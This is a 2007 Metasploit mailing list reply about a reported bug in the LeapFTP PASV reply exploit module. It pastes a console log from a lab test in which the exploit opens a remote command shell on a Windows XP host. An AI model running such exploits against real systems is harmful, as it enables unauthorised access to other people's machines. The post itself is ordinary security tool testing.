Metasploit mailing list archives

Bug in exploit/windows/ftp/leapftp_pasv_reply


From: patrick at aushack.com (Patrick Webster)
Date: Sat, 22 Sep 2007 13:03:52 +1000

Hi Sairam,

I have tested your Korean version (says Chinese (PRC)).

It worked fine for me... though I did use a reverse shell.

msf exploit(leapftp_pasv_reply) > rexploit
[*] Stopping existing job...
[*] Server stopped.
[*] Started bind handler
[*] Server started.
[*] Exploit running as background job.
msf exploit(leapftp_pasv_reply) >
[*] Started bind handler
[*] Command shell session 2 opened (192.168.195.1:1471 ->
192.168.195.132:4444)

msf exploit(leapftp_pasv_reply) > sessions -l -v

Active sessions
===============

  Id  Description    Tunnel
Via
  --  -----------    ------
---
  2   Command shell  192.168.195.1:1471 -> 192.168.195.132:4444
windows/ftp/leapftp_pasv_reply

msf exploit(leapftp_pasv_reply) > sessions -i 2
[*] Starting interaction with 2...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Inetpub\ftproot\winxp>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

C:\Inetpub\ftproot\winxp>exit
exit

[*] Command shell session 2 closed.

-Patrick
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070922/70e1dcca/attachment.htm>


Current thread: